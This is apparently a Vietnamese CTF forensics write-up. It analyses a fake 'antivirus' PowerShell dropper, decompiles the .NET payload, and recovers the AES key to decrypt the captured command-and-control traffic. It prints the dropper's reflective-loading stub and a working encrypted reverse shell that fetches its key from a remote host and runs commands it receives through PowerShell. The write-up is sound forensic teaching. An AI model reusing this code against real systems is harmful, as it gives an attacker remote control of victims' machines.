0x79,0x4e,0x61,0x6d,0x65,0x08,0x2e,0x4e,0x45,0x54,0x20,0x38,0x2e,0x30,0x0d,0x01,0x00,0x08,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x00,0x00,0x0a,0x01,0x00,0x05,0x44,0x65,0x62,0x75,0x67,0x00,0x00,0x0c,0x01,0x00,0x07,0x31,0x2e,0x30,0x2e,0x30,0x2e,0x30,0x00,0x00,0x33,0x01,0x00,0x2e,0x31,0x2e,0x30,0x2e,0x30,0x2b,0x62,0x33,0x33,0x36,0x37,0x63,0x37,0x37,0x64,0x61,0x64,0x62,0x35,0x32,0x38,0x39,0x62,0x65,0x62,0x30,0x37,0x63,0x61,0x63,0x35,0x32,0x37,0x33,0x38,0x35,0x30,0x34,0x61,0x30,0x66,0x35,0x63,0x30,0x33,0x39,0x00,0x00,0x05,0x01,0x00,0x02,0x00,0x00,0x05,0x01,0x00,0x00,0x00,0x00,0x05,0x01,0x00,0x01,0x00,0x00,0x04,0x01,0x00,0x00,0x00,0x08,0x01,0x00,0x0b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xed,0x46,0xf1,0xf4,0x00,0x01,0x4d,0x50,0x02,0x00,0x00,0x00,0x61,0x00,0x00,0x00,0x40,0x33,0x00,0x00,0x40,0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x13,0x00,0x00,0x00,0x27,0x00,0x00,0x00,0xa1,0x33,0x00,0x00,0xa1,0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x52,0x53,0x44,0x53,0x16,0x64,0xfc,0x88,0x46,0xd1,0x0f,0x4c,0x88,0x16,0x2a,0x62,0x5d,0x28,0x9c,0x20,0x01,0x00,0x00,0x00,0x43,0x3a,0x5c,0x55,0x73,0x65,0x72,0x73,0x5c,0x4d,0x69,0x63,0x68,0x61,0x42,0x5c,0x77,0x68,0x2d,0x62,0x74,0x73,0x5c,0x66,0x6f,0x72,0x65,0x6e,0x73,0x69,0x63,0x73,0x32,0x5c,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x5c,0x6f,0x62,0x6a,0x5c,0x44,0x65,0x62,0x75,0x67,0x5c,0x6e,0x65,0x74,0x38,0x2e,0x30,0x5c,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x2e,0x70,0x64,0x62,0x00,0x53,0x48,0x41,0x32,0x35,0x36,0x00,0x16,0x64,0xfc,0x88,0x46,0xd1,0x0f,0x4c,0x48,0x16,0x2a,0x62,0x5d,0x28,0x9c,0x20,0xed,0x46,0xf1,0xf4,0x83,0x26,0xff,0xdc,0x33,0xbb,0x1f,0xf1,0x9d,0xfb,0xf3,0xcd,0xf0,0x33,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0a,0x34,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0x33,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5f,0x43,0x6f,0x72,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x00,0x6d,0x73,0x63,0x6f,0x72,0x65,0x65,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x10,0x00,0x00,0x00,0x18,0x00,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x58,0x40,0x00,0x00,0x14,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x03,0x34,0x00,0x00,0x00,0x56,0x00,0x53,0x00,0x5f,0x00,0x56,0x00,0x45,0x00,0x52,0x00,0x53,0x00,0x49,0x00,0x4f,0x00,0x4e,0x00,0x5f,0x00,0x49,0x00,0x4e,0x00,0x46,0x00,0x4f,0x00,0x00,0x00,0x00,0x00,0xbd,0x04,0xef,0xfe,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x00,0x01,0x00,0x56,0x00,0x61,0x00,0x72,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x49,0x00,0x6e,0x00,0x66,0x00,0x6f,0x00,0x00,0x00,0x00,0x00,0x24,0x00,0x04,0x00,0x00,0x00,0x54,0x00,0x72,0x00,0x61,0x00,0x6e,0x00,0x73,0x00,0x6c,0x00,0x61,0x00,0x74,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb0,0x04,0x74,0x02,0x00,0x00,0x01,0x00,0x53,0x00,0x74,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x67,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x49,0x00,0x6e,0x00,0x66,0x00,0x6f,0x00,0x00,0x00,0x50,0x02,0x00,0x00,0x01,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x34,0x00,0x62,0x00,0x30,0x00,0x00,0x00,0x32,0x00,0x09,0x00,0x01,0x00,0x43,0x00,0x6f,0x00,0x6d,0x00,0x70,0x00,0x61,0x00,0x6e,0x00,0x79,0x00,0x4e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x00,0x00,0x00,0x00,0x3a,0x00,0x09,0x00,0x01,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x44,0x00,0x65,0x00,0x73,0x00,0x63,0x00,0x72,0x00,0x69,0x00,0x70,0x00,0x74,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x00,0x00,0x00,0x00,0x30,0x00,0x08,0x00,0x01,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x56,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0x31,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x00,0x00,0x3a,0x00,0x0d,0x00,0x01,0x00,0x49,0x00,0x6e,0x00,0x74,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6c,0x00,0x4e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x02,0x00,0x01,0x00,0x4c,0x00,0x65,0x00,0x67,0x00,0x61,0x00,0x6c,0x00,0x43,0x00,0x6f,0x00,0x70,0x00,0x79,0x00,0x72,0x00,0x69,0x00,0x67,0x00,0x68,0x00,0x74,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x42,0x00,0x0d,0x00,0x01,0x00,0x4f,0x00,0x72,0x00,0x69,0x00,0x67,0x00,0x69,0x00,0x6e,0x00,0x61,0x00,0x6c,0x00,0x46,0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x32,0x00,0x09,0x00,0x01,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x64,0x00,0x75,0x00,0x63,0x00,0x74,0x00,0x4e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x45,0x00,0x78,0x00,0x65,0x00,0x63,0x00,0x75,0x00,0x74,0x00,0x6f,0x00,0x72,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x2f,0x00,0x01,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x64,0x00,0x75,0x00,0x63,0x00,0x74,0x00,0x56,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x31,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2b,0x00,0x62,0x00,0x33,0x00,0x33,0x00,0x36,0x00,0x37,0x00,0x63,0x00,0x37,0x00,0x37,0x00,0x64,0x00,0x61,0x00,0x64,0x00,0x62,0x00,0x35,0x00,0x32,0x00,0x38,0x00,0x39,0x00,0x62,0x00,0x65,0x00,0x62,0x00,0x30,0x00,0x37,0x00,0x63,0x00,0x61,0x00,0x63,0x00,0x35,0x00,0x32,0x00,0x37,0x00,0x33,0x00,0x38,0x00,0x35,0x00,0x30,0x00,0x34,0x00,0x61,0x00,0x30,0x00,0x66,0x00,0x35,0x00,0x63,0x00,0x30,0x00,0x33,0x00,0x39,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x08,0x00,0x01,0x00,0x41,0x00,0x73,0x00,0x73,0x00,0x65,0x00,0x6d,0x00,0x62,0x00,0x6c,0x00,0x79,0x00,0x20,0x00,0x56,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x69,0x00,0x6f,0x00,0x6e,0x00,0x00,0x00,0x31,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x0c,0x00,0x00,0x00,0x1c,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00;$assembly = [System.Reflection.Assembly]::Load($data);$type = $assembly.GetType("Executor");$method = $type.GetMethod("Run");$method.Invoke($null, $null); };Write-Host "Welcome to the BTS Antivirus!!!";Write-Host "Starting full system scan...";Start-Job -ScriptBlock $sb | Out-Null;Start-Sleep 10;Write-Host "Scan complete - no viruses found :D"
  • Đoạn mã này được viết bằng PowerShell và có mục đích nạp một assembly từ một mảng byte, sau đó gọi một phương thức của lớp Executor để thực thi mã bên trong assembly đó.
  • Sử dụng cyberchef để lưu file này về và tiến hành phân tích
  • image
  • Bước đầu ta xác định được file sử dụng .NET
  • image
  • Sử dụng dnSpy để xem mã nguồn của nó
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

public static void Run()
{
	using (Aes aes = Aes.Create())
	{
		ServicePointManager.ServerCertificateValidationCallback = (([Nullable(1)] object <p0>, X509Certificate <p1>, X509Chain <p2>, SslPolicyErrors <p3>) => true);
		aes.Key = new WebClient().DownloadData("https://192.168.56.1:5000/get_key");
		aes.IV = Encoding.UTF8.GetBytes("Z6LhFDiCgfOB8HNK");
		aes.Mode = 1;
		ICryptoTransform encryptor = aes.CreateEncryptor(aes.Key, aes.IV);
		ICryptoTransform decryptor = aes.CreateDecryptor(aes.Key, aes.IV);
		using (TcpClient tcpClient = new TcpClient("192.168.56.1", 8888))
		{
			using (NetworkStream stream = tcpClient.GetStream())
			{
				byte[] array = new byte[4096];
				try
				{
					for (;;)
					{
						int count = stream.Read(array, 0, array.Length);
						string command = Executor.Decrypt(array.Take(count).ToArray<byte>(), decryptor);
						string plaintext = Executor.ExecuteCommand(command);
						byte[] array2 = Executor.Encrypt(plaintext, encryptor);
						byte[] bytes = BitConverter.GetBytes(array2.Length);
						stream.Write(bytes.Concat(array2).ToArray<byte>(), 0, array2.Length + 4);
					}
				}
				catch (Exception ex)
				{
					stream.Write(Encoding.UTF8.GetBytes(ex.Message), 0, ex.Message.Length);
				}
			}
		}
	}
}

private static string ExecuteCommand(string command)
{
	Process process = new Process
	{
		StartInfo = new ProcessStartInfo
		{
			FileName = "powershell.exe",
			Arguments = "-Command " + command,
			RedirectStandardOutput = true,
			UseShellExecute = false,
			CreateNoWindow = true,
			RedirectStandardError = true
		}
	};
	process.Start();
	string result = process.StandardOutput.ReadToEnd();
	process.WaitForExit();
	return result;
}
private static byte[] Encrypt(string plaintext, ICryptoTransform encryptor)
{
	MemoryStream memoryStream = new MemoryStream();
	byte[] result;
	using (CryptoStream cryptoStream = new CryptoStream(memoryStream, encryptor, 1))
	{
		using (StreamWriter streamWriter = new StreamWriter(cryptoStream))
		{
			streamWriter.Write(plaintext);
		}
		result = memoryStream.ToArray();
	}
	return result;
}
private static string Decrypt(byte[] ciphertext, ICryptoTransform decryptor)
{
	MemoryStream memoryStream = new MemoryStream(ciphertext);
	string result;
	using (CryptoStream cryptoStream = new CryptoStream(memoryStream, decryptor, 0))
	{
		using (StreamReader streamReader = new StreamReader(cryptoStream))
		{
			result = streamReader.ReadToEnd();
		}
	}
	return result;
}
  • Chú ý hàm Run ta thấy IV được khai báo từ chuỗi Z6LhFDiCgfOB8HNK và key được lấy từ https://192.168.56.1:5000/get_key sau đó thực thi và gửi dữ liệu lên 192.168.56.1:8888
  • Tại dòng stream.Write(bytes.Concat(array2).ToArray<byte>(), 0, array2.Length + 4); ta thấy rằng chúng sẽ gửi trước 4 byte để xác định độ dài dữ liệu truyền đi.
  • Vấn đề là chúng ta không tìm được key trong wireshark. Ta chuyển hướng sang file DMP.
  • Ý tưởng của mình là sử dụng Windbg để trích xuất key trong thread của quá trình giải mã, tuy nhiên mình không tìm được nên phải chuyển sang công cụ bulk_extractor.
1
2

Bulk_extractor là một công cụ khai thác pháp y kỹ thuật số hiệu suất cao. Nó giúp quét nhanh các loại đầu vào như hình ảnh đĩa, tệp hoặc thư mục và trích xuất thông tin có cấu trúc như email, số thẻ tín dụng, ảnh JPEG và đoạn JSON mà không cần phân tích hệ thống tệp. Kết quả được lưu dưới dạng tệp văn bản dễ dàng kiểm tra hoặc sử dụng cho các bước xử lý pháp y khác. Bulk_extractor cũng tạo biểu đồ về các đặc điểm như tìm kiếm Google và địa chỉ email, rất hữu ích trong điều tra và thực thi pháp luật.
Không giống như các công cụ pháp y kỹ thuật số khác, bulk_extractor thăm dò từng byte dữ liệu để kiểm tra xem liệu có phải là phần đầu của chuỗi có thể giải nén hoặc giải mã được hay không. Nếu đúng, dữ liệu sau khi giải mã sẽ được kiểm tra lại theo cách đệ quy. Do đó, bulk_extractor có thể tìm thấy những dữ liệu như JPEG được mã hóa BASE64 và các đối tượng JSON nén mà các công cụ khôi phục dữ liệu truyền thống thường bỏ sót.
  • Sau khi chạy ta thu được file tên là aes_keys, bên trong bao gồm tất cả các key AES được trích xuất từ file DMP
  • image
    1
2
3
4
5
6

    38249768	74 f4 90 6e 54 93 55 8d 1f e7 49 34 50 85 52 3d	AES128
38310248	19 67 e8 d7 51 90 d1 cf b6 c5 4e 1d 24 e8 ce 5c 63 af b8 69 e1 f5 d3 16 69 1a 12 18 7d ea 80 96	AES256
38310904	5e 91 2d be 74 0c 3b 61 4f 88 31 11 07 89 18 65 0f 94 ef b2 88 84 6b 2f 27 c0 a0 8b 5f 3b c7 fb	AES256
41295104	19 67 e8 d7 51 90 d1 cf b6 c5 4e 1d 24 e8 ce 5c 63 af b8 69 e1 f5 d3 16 69 1a 12 18 7d ea 80 96	AES256
41295760	5e 91 2d be 74 0c 3b 61 4f 88 31 11 07 89 18 65 0f 94 ef b2 88 84 6b 2f 27 c0 a0 8b 5f 3b c7 fb	AES256
43772072	74 f4 90 6e 54 93 55 8d 1f e7 49 34 50 85 52 3d	AES128
  • Bây giờ ta đã có key, bắt đầu giải mã các dữ liệu thôi
  • Trước tiên ta phải lấy data được gửi đi và nhận về với tshark.
  • Đầu tiên là dữ liệu máy victim gửi đi : tshark -r c73942da210e547b5addab8e46dc5ce2.pcapng -Y “tcp.dstport == 8888 && data.data” -Tfields -e data.data > data2.txt
  • Mình sẽ viết script giải mã các dữ liệu này:

  • Tiếp theo là dữ liệu máy victim nhận : tshark -r c73942da210e547b5addab8e46dc5ce2.pcapng -Y “tcp.srcport == 8888 && data.data” -Tfields -e data.data > data1.txt

  • Mình sẽ viết script giải mã tất cả
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
key = b"\x74\xf4\x90\x6e\x54\x93\x55\x8d\x1f\xe7\x49\x34\x50\x85\x52\x3d"
iv = b"Z6LhFDiCgfOB8HNK"
def aes_decrypt(ciphertext, key, iv):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted_data = cipher.decrypt(ciphertext)
    plaintext = unpad(decrypted_data, AES.block_size)
    return plaintext
with open("data2.txt", "r") as file2:
    data2 = file2.readlines()
with open("data1.txt", "r") as file1:
    data1 = file1.readlines()
for i in range(0, len(data1)):
	encrypt_data1 =  data1[i].strip()
	decoded_bytes = bytes.fromhex(encrypt_data1)
	print(aes_decrypt(decoded_bytes, key, iv).decode('utf-8'))
	encrypt_data2 =  data2[i].strip()[8:]
	decoded_bytes = bytes.fromhex(encrypt_data2)
	print(aes_decrypt(decoded_bytes, key, iv).decode('utf-8'))
  • Và đây là đầu ra
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127

whoami
bob-pc\bob

pwd

Path        
----        
C:\Users\bob



gci Env:

Name                           Value                                                                                   
----                           -----                                                                                   
ALLUSERSPROFILE                C:\ProgramData                                                                          
APPDATA                        C:\Users\bob\AppData\Roaming                                                            
CommonProgramFiles             C:\Program Files\Common Files                                                           
CommonProgramFiles(x86)        C:\Program Files (x86)\Common Files                                                     
CommonProgramW6432             C:\Program Files\Common Files                                                           
COMPUTERNAME                   BOB-PC                                                                                  
ComSpec                        C:\Windows\system32\cmd.exe                                                             
DriverData                     C:\Windows\System32\Drivers\DriverData                                                  
flag_part                      BtSCTF{Sti11                                                                            
HOMEDRIVE                      C:                                                                                      
HOMEPATH                       \Users\bob                                                                              
LOCALAPPDATA                   C:\Users\bob\AppData\Local                                                              
LOGONSERVER                    \\BOB-PC                                                                                
NUMBER_OF_PROCESSORS           4                                                                                       
OneDrive                       C:\Users\bob\OneDrive                                                                   
OS                             Windows_NT                                                                              
Path                           C:\Program Files\PowerShell\7;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem...
PATHEXT                        .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL                              
POWERSHELL_DISTRIBUTION_CHA... MSI:Windows 10 Pro                                                                      
POWERSHELL_TELEMETRY_OPTOUT    1                                                                                       
PROCESSOR_ARCHITECTURE         AMD64                                                                                   
PROCESSOR_IDENTIFIER           AMD64 Family 23 Model 113 Stepping 0, AuthenticAMD                                      
PROCESSOR_LEVEL                23                                                                                      
PROCESSOR_REVISION             7100                                                                                    
ProgramData                    C:\ProgramData                                                                          
ProgramFiles                   C:\Program Files                                                                        
ProgramFiles(x86)              C:\Program Files (x86)                                                                  
ProgramW6432                   C:\Program Files                                                                        
